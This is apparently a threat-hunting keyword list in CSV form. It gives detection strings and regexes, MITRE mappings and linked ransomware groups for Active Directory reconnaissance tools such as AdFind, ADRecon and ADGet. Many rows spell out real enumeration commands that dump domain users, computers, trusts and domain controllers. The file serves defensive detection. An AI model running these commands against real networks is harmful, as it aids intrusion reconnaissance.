"*adexplorer64a.exe*",".{0,1000}adexplorer64a\.exe.{0,1000}","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","Lapsus$ - Scattered Spider*","Discovery","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
"* dclist *",".{0,1000}\sdclist\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -f ""(objectcategory=computer)"" -s subtree dn operatingSystem*",".{0,1000}\s\-f\s\""\(objectcategory\=computer\)\""\s\-s\ssubtree\sdn\soperatingSystem.{0,1000}","greyware_tool_keyword","adfind","Enumerate All Computers in the Domain","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -f ""(objectcategory=person)"" -s subtree samaccountname userPrincipalName*",".{0,1000}\s\-f\s\""\(objectcategory\=person\)\""\s\-s\ssubtree\ssamaccountname\suserPrincipalName.{0,1000}","greyware_tool_keyword","adfind","Enumerate All Users in the Domain","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -f ""(objectcategory=trustedDomain)"" -s subtree name trustAttributes trustDirection trustType*",".{0,1000}\s\-f\s\""\(objectcategory\=trustedDomain\)\""\s\-s\ssubtree\sname\strustAttributes\strustDirection\strustType.{0,1000}","greyware_tool_keyword","adfind","Dump All Domain Trusts","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -sc trustdump*",".{0,1000}\s\-sc\strustdump.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.exe -gcb -sc trustdmp > *",".{0,1000}\.exe\s\-gcb\s\-sc\strustdmp\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z"
"*.exe -sc adinfo > *",".{0,1000}\.exe\s\-sc\sadinfo\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z"
"*.exe -sc dclist > *",".{0,1000}\.exe\s\-sc\sdclist\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z"
"*.exe -sc trustdmp > *",".{0,1000}\.exe\s\-sc\strustdmp\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z"
"*.exe -subnets -f (objectCategory=subnet) > *",".{0,1000}\.exe\s\-subnets\s\-f\s\(objectCategory\=subnet\)\s\>\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z"
"*/AdFind.zip*",".{0,1000}\/AdFind\.zip.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\adf.bat*",".{0,1000}\\adf\.bat.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://github.com/aancw/community-threats/blob/82ece2dec931d175ed47276d426f526610aa8262/Ryuk/VFS/adf.bat#L4","1","0","N/A","N/A","10","1","0","0","2022-02-15T23:58:54Z","2022-02-24T18:51:11Z"
"*\adfind.cf*",".{0,1000}\\adfind\.cf.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AdFind.zip*",".{0,1000}\\AdFind\.zip.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AdFind<*",".{0,1000}\>AdFind\<.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A"
"*484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384*",".{0,1000}484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*adfind -f *",".{0,1000}adfind\s\-f\s.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*adfind -f objectclass=trusteddomain*",".{0,1000}adfind\s\-f\sobjectclass\=trusteddomain.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*adfind -sc trustdmp*",".{0,1000}adfind\s\-sc\strustdmp.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*adfind.bat*",".{0,1000}adfind\.bat.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*adfind.exe -f objectclass=trusteddomain*",".{0,1000}adfind\.exe\s\-f\sobjectclass\=trusteddomain.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*adfind.exe -sc trustdmp*",".{0,1000}adfind\.exe\s\-sc\strustdmp.{0,1000}","greyware_tool_keyword","adfind","query domain trusts with adfind","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*adfind.exe*",".{0,1000}adfind\.exe.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*AdFind\AdFind.cpp*",".{0,1000}AdFind\\AdFind\.cpp.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AdFind_original.exe*",".{0,1000}AdFind_original\.exe.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*computers_pwdnotreqd*",".{0,1000}computers_pwdnotreqd.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*joeware_default_adfind.cf*",".{0,1000}joeware_default_adfind\.cf.{0,1000}","greyware_tool_keyword","adfind","adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers are abusing it to gather valuable information about the network environment","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://www.virustotal.com/gui/file/484dd00e85c033fbfd506b956ac0acd29b30f239755ed753a2788a842425b384/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*name=*Domain Admins*",".{0,1000}name\=.{0,1000}Domain\sAdmins.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*tools/adfind*",".{0,1000}tools\/adfind.{0,1000}","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","MAZE - BlackSuit - Royal - PLAY - LockBit - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - XingLocker - REvil - Ryuk - NetWalker - INC Ransom - Black Basta - TA505 - Wizard Spider - FIN7 - FIN6 - Akira - APT29 - menuPass","Discovery","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*/ADGet.exe*",".{0,1000}\\ADGet\.exe.{0,1000}","greyware_tool_keyword","adget","gather valuable informations about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ADGet.exe*",".{0,1000}\\ADGet\.exe.{0,1000}","greyware_tool_keyword","adget","gather valuable informations about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*hhdobjgopfphlmjbmnpglhfcgppchgje*",".{0,1000}hhdobjgopfphlmjbmnpglhfcgppchgje.{0,1000}","greyware_tool_keyword","AdGuard VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*# adiskreader *",".{0,1000}\#\sadiskreader\s.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","0","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z"
"*\adiskreader\*",".{0,1000}\\adiskreader\\.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","0","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z"
"*adiskreader.disks.raw*",".{0,1000}adiskreader\.disks\.raw.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","1","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z"
"*adiskreader.disks.vhdx*",".{0,1000}adiskreader\.disks\.vhdx.{0,1000}","greyware_tool_keyword","adiskreader","Async Python library to parse local and remote disk images","T1020 - T1048 - T1074 - T1560.001","TA0005 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/skelsec/adiskreader","1","1","N/A","N/A","4","1","70","7","2024-08-20T11:30:11Z","2023-12-18T11:54:31Z"
"* ADRecon.ps1*",".{0,1000}\sADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*$base64adrecon*",".{0,1000}\$base64adrecon.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","#variable","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*/ADRecon.git*",".{0,1000}\/ADRecon\.git.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*/ADRecon.ps1*",".{0,1000}\/ADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*[-] Kerberoast*",".{0,1000}\[\-\]\sKerberoast.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*[Get-ADRRevertToSelf] Token impersonation successfully reverted*",".{0,1000}\[Get\-ADRRevertToSelf\]\sToken\simpersonation\ssuccessfully\sreverted.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
